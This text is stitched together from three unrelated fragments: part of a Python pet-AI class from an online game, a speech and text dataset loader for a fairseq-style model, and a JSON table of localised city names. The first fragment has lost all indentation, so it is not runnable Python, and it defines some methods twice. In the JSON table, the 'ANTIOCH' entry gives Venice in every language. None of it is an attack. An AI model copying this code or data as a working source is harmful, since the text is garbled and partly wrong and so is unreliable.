broadcastZones = list2dict([newZoneId, oldZoneId])
self.estateOwnerId = simbase.air.estateManager.getOwnerFromZone(newZoneId)
if self.estateOwnerId:
if __dev__:
pass
self.inEstate = 1
self.estateZones = simbase.air.estateManager.getEstateZones(self.estateOwnerId)
else:
self.inEstate = 0
self.estateZones = []
PetObserve.send(broadcastZones.keys(), PetObserve.PetActionObserve(PetObserve.Actions.CHANGE_ZONE, self.doId, (oldZoneId, newZoneId)))
def getOwnerId(self):
return self.ownerId
def b_setOwnerId(self, ownerId):
self.d_setOwnerId(ownerId)
self.setOwnerId(ownerId)
def d_setOwnerId(self, ownerId):
self.sendUpdate('setOwnerId', [ownerId])
def setOwnerId(self, ownerId):
self.ownerId = ownerId
def getPetName(self):
return self.petName
def b_setPetName(self, petName):
self.d_setPetName(petName)
self.setPetName(petName)
def d_setPetName(self, petName):
self.sendUpdate('setPetName', [petName])
def setPetName(self, petName):
self.petName = petName
DistributedSmoothNodeAI.DistributedSmoothNodeAI.setName(self, self.petName)
def getTraitSeed(self):
return self.traitSeed
def b_setTraitSeed(self, traitSeed):
self.d_setTraitSeed(traitSeed)
self.setTraitSeed(traitSeed)
def d_setTraitSeed(self, traitSeed):
self.sendUpdate('setTraitSeed', [traitSeed])
def setTraitSeed(self, traitSeed):
self.traitSeed = traitSeed
def getSafeZone(self):
return self.safeZone
def b_setSafeZone(self, safeZone):
self.d_setSafeZone(safeZone)
self.setSafeZone(safeZone)
def d_setSafeZone(self, safeZone):
self.sendUpdate('setSafeZone', [safeZone])
def setSafeZone(self, safeZone):
self.safeZone = safeZone
def getPetName(self):
return self.petName
def b_setPetName(self, petName):
self.d_setPetName(petName)
self.setPetName(petName)
def d_setPetName(self, petName):
self.sendUpdate('setPetName', [petName])
def setPetName(self, petName):
self.petName = petName
DistributedSmoothNodeAI.DistributedSmoothNodeAI.setName(self, self.petName)
def setTraits(self, traitList):
self.traitList = traitList
def __generateDistTraitFuncs(self):
for i in xrange(PetTraits.PetTraits.NumTraits):
traitName = PetTraits.getTraitNames()[i]
getterName = self.getSetterName(traitName, 'get')
b_setterName = self.getSetterName(traitName, 'b_set')
d_setterName = self.getSetterName(traitName, 'd_set')
setterName = self.getSetterName(traitName)
def traitGetter(i = i):
return self.traitList[i]
def b_traitSetter(value, setterName = setterName, d_setterName = d_setterName):
self.__dict__[d_setterName](value)
self.__dict__[setterName](value)
def d_traitSetter(value, setterName = setterName):
self.sendUpdate(setterName, [value])
def traitSetter(value, i = i):
self.traitList[i] = value
self.__dict__[getterName] = traitGetter
self.__dict__[b_setterName] = b_traitSetter
self.__dict__[d_setterName] = d_traitSetter
self.__dict__[setterName] = traitSetter
self.__funcsToDelete.append(getterName)
self.__funcsToDelete.append(b_setterName)
self.__funcsToDelete.append(d_setterName)
self.__funcsToDelete.append(setterName)
def getHead(self):
return self.head
def b_setHead(self, head):
self.d_setHead(head)
self.setHead(head)
def d_setHead(self, head):
self.sendUpdate('setHead', [head])
def setHead(self, head):
self.head = head
def getEars(self):
return self.ears
def b_setEars(self, ears):
self.d_setEars(ears)
self.setEars(ears)
def d_setEars(self, ears):
self.sendUpdate('setEars', [ears])
def setEars(self, ears):
self.ears = ears
def getNose(self):
return self.nose
def b_setNose(self, nose):
self.d_setNose(nose)
self.setNose(nose)
def d_setNose(self, nose):
self.sendUpdate('setNose', [nose])
def setNose(self, nose):
self.nose = nose
def getTail(self):
return self.tail
def b_setTail(self, tail):
self.d_setTail(tail)
self.setTail(tail)
def d_setTail(self, tail):
self.sendUpdate('setTail', [tail])
def setTail(self, tail):
self.tail = tail
def getBodyTexture(self):
return self.bodyTexture
def b_setBodyTexture(self, bodyTexture):
self.d_setBodyTexture(bodyTexture)
self.setBodyTexture(bodyTexture)
def d_setBodyTexture(self, bodyTexture):
self.sendUpdate('setBodyTexture', [bodyTexture])
def setBodyTexture(self, bodyTexture):
self.bodyTexture = bodyTexture
def getColor(self):
return self.color
def b_setColor(self, color):
self.d_setColor(color)
self.setColor(color)
def d_setColor(self, color):
self.sendUpdate('setColor', [color])
def setColor(self, color):
self.color = color
def getColorScale(self):
return self.colorScale
def b_setColorScale(self, colorScale):
self.d_setColorScale(colorScale)
self.setColorScale(colorScale)
def d_setColorScale(self, colorScale):
self.sendUpdate('setColorScale', [colorScale])
def setColorScale(self, colorScale):
self.colorScale = colorScale
def getEyeColor(self):
return self.eyeColor
def b_setEyeColor(self, eyeColor):
self.d_setEyeColor(eyeColor)
self.setEyeColor(eyeColor)
def d_setEyeColor(self, eyeColor):
self.sendUpdate('setEyeColor', [eyeColor])
def setEyeColor(self, eyeColor):
self.eyeColor = eyeColor
def getGender(self):
return self.gender
def b_setGender(self, gender):
self.d_setGender(gender)
self.setGender(gender)
def d_setGender(self, gender):
self.sendUpdate('setGender', [gender])
def setGender(self, gender):
self.gender = gender
def teleportIn(self, timestamp = None):
self.notify.debug('DPAI: teleportIn')
timestamp = ClockDelta.globalClockDelta.getRealNetworkTime()
self.notify.debug('DPAI: sending update @ ts = %s' % timestamp)
self.sendUpdate('teleportIn', [timestamp])
return None
def teleportOut(self, timestamp = None):
self.notify.debug('DPAI: teleportOut')
timestamp = ClockDelta.globalClockDelta.getRealNetworkTime()
self.notify.debug('DPAI: sending update @ ts = %s' % timestamp)
self.sendUpdate('teleportOut', [timestamp])
return None
def getLastSeenTimestamp(self):
return self.lastSeenTimestamp
def b_setLastSeenTimestamp(self, timestamp):
self.d_setLastSeenTimestamp(timestamp)
self.setLastSeenTimestamp(timestamp)
def d_setLastSeenTimestamp(self, timestamp):
self.sendUpdate('setLastSeenTimestamp', [timestamp])
def setLastSeenTimestamp(self, timestamp):
self.lastSeenTimestamp = timestamp
def getCurEpochTimestamp(self):
return int(time.time())
def getTimeSinceLastSeen(self):
t = time.time() - self.lastSeenTimestamp
return max(0.0, t)
def __handleMoodSet(self, component, value):
if self.isGenerated():
self.mood.setComponent(component, value)
else:
self.requiredMoodComponents[component] = value
def __handleMoodGet(self, component):
if self.isGenerated():
return self.mood.getComponent(component)
else:
return 0.0
def __generateDistMoodFuncs(self):
for compName in PetMood.PetMood.Components:
getterName = self.getSetterName(compName, 'get')
setterName = self.getSetterName(compName)
def moodGetter(compName = compName):
return self.__handleMoodGet(compName)
def b_moodSetter(value, setterName = setterName):
self.__dict__[setterName](value)
def d_moodSetter(value, setterName = setterName):
self.sendUpdate(setterName, [value])
def moodSetter(value, compName = compName):
self.__handleMoodSet(compName, value)
self.__dict__[getterName] = moodGetter
self.__dict__['b_%s' % setterName] = b_moodSetter
self.__dict__['d_%s' % setterName] = d_moodSetter
self.__dict__[setterName] = moodSetter
self.__funcsToDelete.append(getterName)
self.__funcsToDelete.append('b_%s' % setterName)
self.__funcsToDelete.append('d_%s' % setterName)
self.__funcsToDelete.append(setterName)
def getTrickAptitudes(self):
return self.trickAptitudes
def b_setTrickAptitudes(self, aptitudes):
self.setTrickAptitudes(aptitudes, local=1)
self.d_setTrickAptitudes(aptitudes)
def d_setTrickAptitudes(self, aptitudes):
if __dev__:
for aptitude in aptitudes:
pass
while len(aptitudes) < len(PetTricks.Tricks) - 1:
aptitudes.append(0.0)
self.sendUpdate('setTrickAptitudes', [aptitudes])
def setTrickAptitudes(self, aptitudes, local = 0):
if not local:
DistributedPetAI.notify.debug('setTrickAptitudes: %s' % aptitudes)
while len(self.trickAptitudes) < len(PetTricks.Tricks) - 1:
self.trickAptitudes.append(0.0)
self.trickAptitudes = aptitudes
def getTrickAptitude(self, trickId):
if trickId > len(self.trickAptitudes) - 1:
return 0.0
return self.trickAptitudes[trickId]
def setTrickAptitude(self, trickId, aptitude, send = 1):
aptitude = clampScalar(aptitude, 0.0, 1.0)
aptitudes = self.trickAptitudes
while len(aptitudes) - 1 < trickId:
aptitudes.append(0.0)
if aptitudes[trickId] != aptitude:
aptitudes[trickId] = aptitude
if send:
self.b_setTrickAptitudes(aptitudes)
else:
self.setTrickAptitudes(aptitudes, local=1)
def announceGenerate(self):
DistributedSmoothNodeAI.DistributedSmoothNodeAI.announceGenerate(self)
self._hasCleanedUp = False
self.setHasRequestedDelete(False)
self.b_setParent(ToontownGlobals.SPHidden)
self.lockedDown = 0
self.leashMode = 0
self.leashAvId = None
self.leashGoal = None
self.trickLogger = ServerEventBuffer.ServerEventMultiAccumulator(self.air, 'petTricksPerformed', self.doId)
self.trickFailLogger = ServerEventBuffer.ServerEventMultiAccumulator(self.air, 'petTricksFailed', self.doId)
self.feedLogger = ServerEventBuffer.ServerEventAccumulator(self.air, 'petFeedings', self.doId)
self.scratchLogger = ServerEventBuffer.ServerEventAccumulator(self.air, 'petScratchings', self.doId)
self.traits = PetTraits.PetTraits(self.traitSeed, self.safeZone)
if not hasattr(self, '_beingCreatedInDB'):
for i in xrange(len(self.traitList)):
value = self.traitList[i]
if value == 0.0:
traitName = PetTraits.getTraitNames()[i]
traitValue = self.traits.getTraitValue(traitName)
DistributedPetAI.notify.info("%s: initializing new trait '%s' to %s, seed=%s" % (self.doId,
traitName,
traitValue,
self.traitSeed))
setterName = self.getSetterName(traitName, 'b_set')
self.__dict__[setterName](traitValue)
self.mood = PetMood.PetMood(self)
if not self.active:
return
self.activated = 1
self.announceZoneChange(self.zoneId, ToontownGlobals.QuietZone)
self.b_setParent(ToontownGlobals.SPRender)
self.setPos(randFloat(-20, 20), randFloat(-20, 20), 0)
self.setH(randFloat(360))
if self.initialDNA:
self.setDNA(self.initialDNA)
for mood, value in self.requiredMoodComponents.items():
self.mood.setComponent(mood, value, announce=0)
self.requiredMoodComponents = {}
self.brain = PetBrain.PetBrain(self)
self.mover = PetMoverAI(self)
self.enterPetLook()
self.actionFSM = PetActionFSM.PetActionFSM(self)
self.teleportIn()
self.handleMoodChange(distribute=0)
taskMgr.doMethodLater(simbase.petMovePeriod * random.random(), self.move, self.getMoveTaskName())
self.startPosHprBroadcast()
self.accept(PetObserve.getEventName(self.zoneId), self.brain.observe)
self.accept(self.mood.getMoodChangeEvent(), self.handleMoodChange)
self.mood.start()
self.brain.start()
return
def _isPet(self):
return 1
def setHasRequestedDelete(self, flag):
self._requestedDeleteFlag = flag
def hasRequestedDelete(self):
return self._requestedDeleteFlag
def requestDelete(self, task = None):
DistributedPetAI.notify.info('PetAI.requestDelete: %s, owner=%s' % (self.doId, self.ownerId))
if self.hasRequestedDelete():
DistributedPetAI.notify.info('PetAI.requestDelete: %s, owner=%s returning immediately' % (self.doId, self.ownerId))
return
self.setHasRequestedDelete(True)
self.b_setLastSeenTimestamp(self.getCurEpochTimestamp())
DistributedSmoothNodeAI.DistributedSmoothNodeAI.requestDelete(self)
def _doDeleteCleanup(self):
self.trickLogger.destroy()
self.trickFailLogger.destroy()
self.feedLogger.destroy()
self.scratchLogger.destroy()
del self.trickLogger
del self.trickFailLogger
del self.feedLogger
del self.scratchLogger
taskMgr.remove(self.uniqueName('clearMovie'))
taskMgr.remove(self.uniqueName('PetMovieWait'))
taskMgr.remove(self.uniqueName('PetMovieClear'))
taskMgr.remove(self.uniqueName('PetMovieComplete'))
taskMgr.remove(self.getLockMoveTaskName())
taskMgr.remove(self.getMoveTaskName())
if hasattr(self, 'zoneId'):
self.announceZoneChange(ToontownGlobals.QuietZone, self.zoneId)
else:
myDoId = 'No doId'
myTaskName = 'No task name'
myStackTrace = StackTrace().trace
myOldStackTrace = 'No Trace'
if hasattr(self, 'doId'):
myDoId = self.doId
if task:
myTaskName = task.name
if hasattr(self, 'destroyDoStackTrace'):
myOldStackTrace = self.destroyDoStackTrace.trace
simbase.air.writeServerEvent('Pet RequestDelete duplicate', myDoId, 'from task %s' % myTaskName)
simbase.air.writeServerEvent('Pet RequestDelete duplicate StackTrace', myDoId, '%s' % myStackTrace)
simbase.air.writeServerEvent('Pet RequestDelete duplicate OldStackTrace', myDoId, '%s' % myOldStackTrace)
DistributedPetAI.notify.warning('double requestDelete from | |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import itertools
import logging
import os
from random import sample
import sys
from typing import Any, List, Optional, Union
import numpy as np
import torch
import torch.nn.functional as F
from fairseq.data import data_utils
from fairseq.data.fairseq_dataset import FairseqDataset
from fairseq.data.audio.audio_utils import get_fbank
from g2p_en import G2p
logger = logging.getLogger(__name__)
def load_paired_data(manifest_path, max_keep, min_keep):
n_long, n_short = 0,0
data_dict, inds, sizes = [], [], []
with open(manifest_path) as f:
for ind, line in enumerate(f):
items = line.strip().split(":")
if len(items) ==6:
sz = int(items[5])
if min_keep is not None and sz < min_keep:
n_short += 1
elif max_keep is not None and sz > max_keep:
n_long += 1
else:
data_dict.append(
{
"id": items[1].split(" ")[0],
"path": items[2].split(" ")[0],
"phoneme": items[3].split(" ")[0:-1],
"word": items[4].split(" ")[0:-1],
"size": sz,
"style": "paired"
}
)
inds.append(ind)
sizes.append(sz)
elif len(items) == 5:
sz = int(items[4])
if min_keep is not None and sz < min_keep:
n_short += 1
elif max_keep is not None and sz > max_keep:
n_long += 1
else:
data_dict.append(
{
"id": items[1].split(" ")[0],
"path": items[2].split(" ")[0],
"word": items[3].split(" ")[0:-1],
"size": sz,
"style": "paired"
}
)
inds.append(ind)
sizes.append(sz)
tot = ind + 1
logger.info(
(
f"load paired data"
f"max_keep={max_keep}, min_keep={min_keep}, "
f"loaded {len(data_dict)}, skipped {n_short} short and {n_long} long, "
f"longest-loaded={max(sizes)}, shortest-loaded={min(sizes)}"
)
)
return data_dict, inds, sizes
def load_text_only_data(text_only_data_set_path, max_text, min_text):
n_long, n_short = 0.0, 0.0
data_dict, inds, sizes = [],[],[]
with open(text_only_data_set_path) as f:
for ind, line in enumerate(f):
word = line.strip().split(" ")
sz = len(word)
if min_text is not None and sz < min_text:
n_short+=1
elif max_text is not None and sz > max_text:
n_long+=1
else:
inds.append(ind)
data_dict.append(
{
"word": word,
"style": "text",
"size": sz
}
)
sizes.append(sz)
tot = ind + 1
logger.info(
(
f"load text only data"
f"max_keep={max_text}, min_keep={min_text}, "
f"loaded {len(data_dict)}, skipped {n_short} short and {n_long} long, "
f"longest-loaded={max(sizes)}, shortest-loaded={min(sizes)}"
)
)
return data_dict, inds, sizes
class AudioDataset(FairseqDataset):
def __init__(
self,
audio_path: str,
sample_rate: float,
max_keep_sample_size: int = None,
min_keep_sample_size: int = None,
label_processors: Optional[List[Any]] = None,
pad_list: List[str] = None,
eos_list: List[str] = None,
shuffle: bool = True,
pad_audio: bool = True,
normalize: bool = False,
fbank_bins: int = 80,
max_sample_size: int=100000000,
):
self.audio_data_dict, self.audio_inds, self.audio_sizes = load_paired_data(
audio_path, max_keep_sample_size, min_keep_sample_size
)
self.sample_rate = sample_rate
self.shuffle = shuffle
self.pad_list = pad_list
self.eos_list = eos_list
self.label_processors = label_processors
self.fbank_bins = fbank_bins
self.max_sample_size = max_sample_size
self.normalize = normalize
self.dataset = self
self.pad_audio = pad_audio
def __getitem__(self, index):
wav = self.get_audio(index)
phoneme_token,bpe_token = self.get_label(index)
if phoneme_token is not None:
'''
notice!!!
phoneme > 10 is because of the 0-10 in the dictionary of phoneme is <eps>, SIL, SPN
'''
phoneme_token_no_rep = torch.from_numpy(np.array( [ int(phoneme_token[i]) for i in range(1,len(phoneme_token)) if phoneme_token[i] > 10 and (i==1 or phoneme_token[i]!=phoneme_token[i-1]) ] ))
else:
phoneme_token_no_rep = None
return {"id": index, "source": wav, "phoneme": phoneme_token, "bpe":bpe_token, "phoneme_target": phoneme_token_no_rep}
def __len__(self):
return len(self.sizes)
@property
def sizes(self):
return self.audio_sizes
def ordered_indices(self):
if self.shuffle:
order = [np.random.permutation(len(self))]
else:
order = [np.arange(len(self))]
order.append(self.sizes)
return np.lexsort(order)[::-1]
def get_audio(self, index):
import soundfile as sf
wav_path = self.audio_data_dict[index]["path"]
wav, cur_sample_rate = sf.read(wav_path)
wav = torch.from_numpy(wav).float()
if self.normalize:
with torch.no_grad():
wav = F.layer_norm(wav, wav.shape)
return wav
def get_label(self, index):
data = self.audio_data_dict[index]
phoneme_token = None
if "phoneme" in data.keys():
phoneme_token = self.label_processors["phoneme"](data["phoneme"])
bpe_token = self.label_processors["word"](data["word"])
bpe_token = self.label_processors["bpe"](bpe_token)
return phoneme_token, bpe_token
def collater(self, samples):
# target = max(sizes) -> random_crop not used
# target = max_sample_size -> random_crop used for long
samples = [s for s in samples if s["source"] is not None]
if len(samples) == 0:
return {}
audios = [s["source"] for s in samples]
audio_sizes = [len(s) for s in audios]
if self.pad_audio:
audio_size = min(max(audio_sizes), self.max_sample_size)
else:
audio_size = min(min(audio_sizes), self.max_sample_size)
collated_audios, padding_mask, audio_starts = self.collater_audio(
audios, audio_size
)
if samples[0]["phoneme"] is not None:
phoneme_input = [s["phoneme"] for s in samples]
phoneme_target = [s["phoneme_target"] for s in samples]
phoneme_mask = self.phoneme_padding_mask(phoneme_input)
else:
phoneme_input = None
phoneme_target = None
phoneme_mask = None
bpe_target = [s["bpe"] for s in samples]
data_list, lengths_list, ntokens_list = self.collater_label(
phoneme_input, bpe_target, phoneme_target
)
net_input = {
"audio_source": collated_audios,
"padding_mask": padding_mask,
"prev_phoneme": data_list[0],
"phoneme_padding_mask": phoneme_mask,
"mode": "speech",
"lengths": ((torch.from_numpy(np.array(audio_sizes))- (400-320)) / 320).int()
}
batch = {
"id": torch.LongTensor([s["id"] for s in samples]),
"net_input": net_input,
}
batch["input_audio_length"] = (torch.from_numpy(np.array(audio_sizes)) - (400-320)) / 320
batch["phoneme_length"] = lengths_list[2]
batch["phoneme_ntoken"] = ntokens_list[2]
batch["phoneme_target"] = data_list[2]
batch["bpe_length"] = lengths_list[1]
batch["bpe_ntoken"] = ntokens_list[1]
batch["bpe_target"] = data_list[1]
return batch
def phoneme_padding_mask(self, phoneme_target):
phoneme_sizes = [ len(s) for s in phoneme_target]
max_size = max(phoneme_sizes)
batch_size = len(phoneme_target)
padd_mask = torch.zeros((batch_size, max_size)).bool()
for i, phoneme in enumerate(phoneme_target):
diff = max_size - len(phoneme)
if diff == 0:
continue
elif diff < 0:
padd_mask[i, diff:] = True
return padd_mask
def crop_to_max_size(self, wav, target_size):
size = len(wav)
diff = size - target_size
if diff <= 0:
return wav, 0
start, end = 0, target_size
if self.random_crop:
start = np.random.randint(0, diff + 1)
end = size - diff + start
return wav[start:end], start
def collater_audio(self, audios, audio_size):
collated_audios = audios[0].new_zeros(len(audios), audio_size)
padding_mask = (
torch.BoolTensor(collated_audios.shape).fill_(False)
# if self.pad_audio else None
)
audio_starts = [0 for _ in audios]
for i, audio in enumerate(audios):
diff = len(audio) - audio_size
if diff == 0:
collated_audios[i] = audio
elif diff < 0:
assert self.pad_audio
collated_audios[i] = torch.cat(
[audio, audio.new_full((-diff,), 0.0)]
)
padding_mask[i, diff:] = True
else:
collated_audios[i], audio_starts[i] = self.crop_to_max_size(
audio, audio_size
)
return collated_audios, padding_mask, audio_starts
def collater_seq_label(self, targets, pad):
lengths = torch.LongTensor([len(t) for t in targets])
ntokens = lengths.sum().item()
targets = data_utils.collate_tokens(
targets, pad_idx=pad, left_pad=False
)
return targets, lengths, ntokens
def collater_label(self, phoneme_input, bpe_target, phoneme_target):
targets=[None,None,None]
lengths=[None,None,None]
ntokens=[None,None,None]
if phoneme_input is not None:
targets[0], lengths[0], ntokens[0] = self.collater_seq_label(
phoneme_input, self.pad_list[0]
)
targets[1], lengths[1], ntokens[1] = self.collater_seq_label(
bpe_target, self.pad_list[1]
)
if phoneme_target is not None:
targets[2], lengths[2], ntokens[2] = self.collater_seq_label(
phoneme_target, self.pad_list[0]
)
return targets, lengths, ntokens
def size(self, index):
return self.sizes[index]
def num_tokens(self, index: int):
return self.size(index)
class TextDataset(FairseqDataset):
def __init__(
self,
data_file_path: str,
lexicon_path: str,
accume_path: str,
max_text_num:int = None,
min_text_num:int = None,
data_process:Optional[List[Any]] = None,
shuffle: bool = True,
pad_list: List[str] = None,
eos_list: List[str] = None,
):
self.data_dict, self.inds, self.text_sizes = load_text_only_data(
data_file_path, max_text_num, min_text_num
)
self.shuffle = shuffle
self.pad_list = pad_list
self.dataset = self
self.lexicon = self.load_lexicon(lexicon_path)
self.accum_stat = self.load_accum_stat(accume_path)
self.data_process = data_process
self.g2p = G2p()
self.eos_list = eos_list
self.process_data_dict()
def process_data_dict(self):
for index in range(len(self.data_dict)):
self.data_dict[index]["phoneme"], self.data_dict[index]["bpe"],_ =self.get_labels(index)
self.sizes[index] = len(self.data_dict[index]["phoneme"])
def load_lexicon(self, lexicon_path):
lexicon = {}
with open(lexicon_path) as f:
for line in f.readlines():
item = line.strip().split()
lexicon[item[0]] = item[1:]
return lexicon
@property
def sizes(self):
return self.text_sizes
def avoid_zero(self, accum_stat,key):
prefix = key.split("_")[0]
if accum_stat[prefix+"_B"] + accum_stat[prefix+"_I"] + accum_stat[prefix+"_E"] + accum_stat[prefix+"_S"] ==0:
accum_stat[prefix+"_B"] =1
accum_stat[prefix+"_I"] =1
accum_stat[prefix+"_E"] =0
accum_stat[prefix+"_S"] =0
def load_accum_stat(self, accum_path):
accum_stat = {}
str_map = {}
store = []
with open(accum_path) as f:
for line in f.readlines():
item = line.strip().split()
accum_stat[item[0]]=int(item[1])
store.append(int(item[1]))
min = np.min(store)
max = np.max(store)
scale = 8
for key in accum_stat.keys():
accum_stat[key] = int(((accum_stat[key] -min) / (max-min)) * scale)
for key in accum_stat.keys():
self.avoid_zero(accum_stat, key)
print(accum_stat)
for key in accum_stat.keys():
phoneme = key.split("_")[0]
if phoneme not in str_map.keys():
str_map[phoneme] = ((phoneme+"_B"+" ") * accum_stat[phoneme+"_B"] + \
(phoneme+"_I"+" ") * accum_stat[phoneme+"_I"] + \
(phoneme+"_E"+" ") * accum_stat[phoneme+"_E"] + \
(phoneme+"_S"+" ") * accum_stat[phoneme+"_S"] ).split()
return str_map
def __getitem__(self, index):
phoneme_token,bpe_token = self.data_dict[index]["phoneme"], self.data_dict[index]["bpe"]
return {"id": index, "phoneme": phoneme_token, "bpe":bpe_token, "phoneme_target": phoneme_token}
def get_labels(self, index):
words = self.data_dict[index]["word"]
bpe_token = self.data_process["word"](words)
bpe_token = self.data_process["bpe"](bpe_token)
phoneme_token = []
phoneme_norep_token = []
for word in words:
if word in self.lexicon.keys():
build_string = ''
for s in word:
build_string += s+ " "
phoneme_seq = self.g2p(build_string)
phoneme_seq = [i for i in phoneme_seq if i != ' ' and i!="'"]
phoneme_norep_token.extend(phoneme_seq)
for phoneme in phoneme_seq:
phoneme_token.extend(self.accum_stat[phoneme])
phoneme_token = self.data_process["phoneme"](phoneme_token)
phoneme_norep_token = self.data_process["phoneme"](phoneme_norep_token)
return phoneme_token, bpe_token, phoneme_norep_token
| |
"fr_FR": "Amsterdam",
"it_IT": "Amsterdam",
"ja_JP": "アムステルダム",
"ko_KR": "암스테르담",
"pl_PL": "Amsterdam",
"pt_BR": "Amsterdã",
"ru_RU": "Амстердам"
},
"AMSTERDAM_1": {
"de_DE": "Amsterdam",
"es_ES": "Ámsterdam",
"fr_FR": "Amsterdam",
"it_IT": "Amsterdam",
"ja_JP": "アムステルダム",
"ko_KR": "암스테르담",
"pl_PL": "Amsterdam",
"pt_BR": "Amsterdã",
"ru_RU": "Амстердам"
},
"ANA": {
"de_DE": "Ana",
"es_ES": "Ana",
"fr_FR": "Ana",
"it_IT": "Ana",
"ja_JP": "アナ",
"ko_KR": "아나",
"pl_PL": "Ana",
"pt_BR": "Ana",
"ru_RU": "Ана"
},
"ANASHAN": {
"de_DE": "Anashan",
"es_ES": "Anashan",
"fr_FR": "Anashan",
"it_IT": "Anashan",
"ja_JP": "アナシャン",
"ko_KR": "아나샨",
"pl_PL": "Anashan",
"pt_BR": "Ansam",
"ru_RU": "Анашан"
},
"ANCYRA": {
"de_DE": "Ancyra",
"es_ES": "Ancira",
"fr_FR": "Angora",
"it_IT": "Ankara",
"ja_JP": "アンシラ",
"ko_KR": "앙카라",
"pl_PL": "Ancyra",
"pt_BR": "Ancara",
"ru_RU": "Анкира"
},
"ANDEMATUNNUM": {
"de_DE": "Andematunnum",
"es_ES": "Andematunnum",
"fr_FR": "Andemantunnum",
"it_IT": "Andematunnum",
"ja_JP": "アンデマトゥンヌム",
"ko_KR": "안데마투눔",
"pl_PL": "Andematunnum",
"pt_BR": "Andematunnum",
"ru_RU": "Андематун"
},
"ANGERS": {
"de_DE": "Angers",
"es_ES": "Angers",
"fr_FR": "Angers",
"it_IT": "Angers",
"ja_JP": "アンジェ",
"ko_KR": "앙제",
"pl_PL": "Angers",
"pt_BR": "Angers",
"ru_RU": "Анже"
},
"ANGKOR_BOREI": {
"de_DE": "Angkor Borei",
"es_ES": "Angkor Borei",
"fr_FR": "Angkor Borei",
"it_IT": "Angkor Borei",
"ja_JP": "アンコールバライ",
"ko_KR": "앙코르 보레이",
"pl_PL": "Angkor Borei",
"pt_BR": "Angkor Borei",
"ru_RU": "Ангкор Борей"
},
"ANGKOR_THOM": {
"de_DE": "Angkor Thom",
"es_ES": "Angkor Thom",
"fr_FR": "Angkor Thom",
"it_IT": "Angkor Thom",
"ja_JP": "アンコールトム",
"ko_KR": "앙코르 톰",
"pl_PL": "Angkor Thom",
"pt_BR": "Angkor Thom",
"ru_RU": "Ангкор-Тхом"
},
"ANGKOR_WAT": {
"de_DE": "Angkor Wat",
"es_ES": "Angkor Wat",
"fr_FR": "Angkor Vat",
"it_IT": "Angkor Wat",
"ja_JP": "アンコールワット",
"ko_KR": "앙코르와트",
"pl_PL": "Angkor Wat",
"pt_BR": "Angkor Wat",
"ru_RU": "Ангкор-Ват"
},
"ANGOSTURA": {
"de_DE": "Angostura",
"es_ES": "Angostura",
"fr_FR": "Angostura",
"it_IT": "Angostura",
"ja_JP": "アンゴスチュラ",
"ko_KR": "앙고스투라",
"pl_PL": "Angostura",
"pt_BR": "Angostura",
"ru_RU": "Ангостура"
},
"ANGRA": {
"de_DE": "Angra",
"es_ES": "Angra",
"fr_FR": "Angra do Heroísmo",
"it_IT": "Angra",
"ja_JP": "アングラ",
"ko_KR": "앙그라",
"pl_PL": "Angra",
"pt_BR": "Angra",
"ru_RU": "Ангра"
},
"ANICIUM": {
"de_DE": "Anicium",
"es_ES": "Anicium",
"fr_FR": "Anicium",
"it_IT": "Anicium",
"ja_JP": "アニシウム",
"ko_KR": "아니키움",
"pl_PL": "Anicium",
"pt_BR": "Anicium",
"ru_RU": "Анициум"
},
"ANINDITAPURA": {
"de_DE": "Aninditapura",
"es_ES": "Aninditapura",
"fr_FR": "Aninditapura",
"it_IT": "Aninditapura",
"ja_JP": "アニンディタプラ",
"ko_KR": "아닌디타푸라",
"pl_PL": "Aninditapura",
"pt_BR": "Aninditapura",
"ru_RU": "Аниндитапура"
},
"ANKARA": {
"de_DE": "Ankara",
"es_ES": "Ankara",
"fr_FR": "Ankara",
"it_IT": "Ankara",
"ja_JP": "アンカラ",
"ko_KR": "앙카라",
"pl_PL": "Ankara",
"pt_BR": "Ancara",
"ru_RU": "Анкара"
},
"ANKOBER": {
"de_DE": "Ankober",
"es_ES": "Ankober",
"fr_FR": "Ankober",
"it_IT": "Ankober",
"ja_JP": "アンコベル",
"ko_KR": "앙코베르",
"pl_PL": "Ankober",
"pt_BR": "Ankober",
"ru_RU": "Анкобэр"
},
"ANTALO": {
"de_DE": "Antalo",
"es_ES": "Hintalo",
"fr_FR": "Antalo",
"it_IT": "Antalo",
"ja_JP": "アンタロ",
"ko_KR": "안탈로",
"pl_PL": "Antalo",
"pt_BR": "Antalo",
"ru_RU": "Антало"
},
"ANTANANARIVO": {
"de_DE": "Antananarivo",
"es_ES": "Antananarivo",
"fr_FR": "Antananarivo",
"it_IT": "Antananarivo",
"ja_JP": "アンタナナリボ",
"ko_KR": "안타나나리보",
"pl_PL": "Antananarywa",
"pt_BR": "Antananarivo",
"ru_RU": "Антананариву"
},
"ANTAWAYLLA": {
"de_DE": "Antawaylla",
"es_ES": "Antawaylla",
"fr_FR": "Antawaylla",
"it_IT": "Antawaylla",
"ja_JP": "アンタワイラ",
"ko_KR": "안타바일라",
"pl_PL": "Antawaylla",
"pt_BR": "Andahuaylas",
"ru_RU": "Антавайлья"
},
"ANTIGUA": {
"de_DE": "Antigua",
"es_ES": "Antigua",
"fr_FR": "Antigua",
"it_IT": "Antigua",
"ja_JP": "アンティグア",
"ko_KR": "안티구아",
"pl_PL": "Antigua",
"pt_BR": "Antígua",
"ru_RU": "Антигуа"
},
"ANTIOCH": {
"de_DE": "Venedig",
"es_ES": "Venecia",
"fr_FR": "Venise",
"it_IT": "Venezia",
"ja_JP": "ヴェネツィア",
"ko_KR": "베네치아",
"pl_PL": "Wenecja",
"pt_BR": "Veneza",
"ru_RU": "Венеция"
},
"ANTIOCH_BYZANTIUM": {
"de_DE": "Antiochia",
"es_ES": "Antioquía",
"fr_FR": "Antioche",
"it_IT": "Antiochia",
"ja_JP": "アンティオキア",
"ko_KR": "안디옥",
"pl_PL": "Antiochia",
"pt_BR": "Antioquia",
"ru_RU": "Антиохия"
},
"ANTIUM": {
"de_DE": "Antium",
"es_ES": "Antium",
"fr_FR": "Antium",
"it_IT": "Anzio",
"ja_JP": "アンティウム",
"ko_KR": "안티움",
"pl_PL": "Antium",
"pt_BR": "Antium",
"ru_RU": "Анций"
},
"ANTWERP": {
"de_DE": "Antwerpen",
"es_ES": "Amberes",
"fr_FR": "Antwerp",
"it_IT": "Anversa",
"ja_JP": "アントワープ",
"ko_KR": "앤트워프",
"pl_PL": "Antwerpia",
"pt_BR": "Antuérpia",
"ru_RU": "Антверпен"
},
"AOMORI": {
"de_DE": "Aomori",
"es_ES": "Aomori",
"fr_FR": "Aomori",
"it_IT": "Aomori",
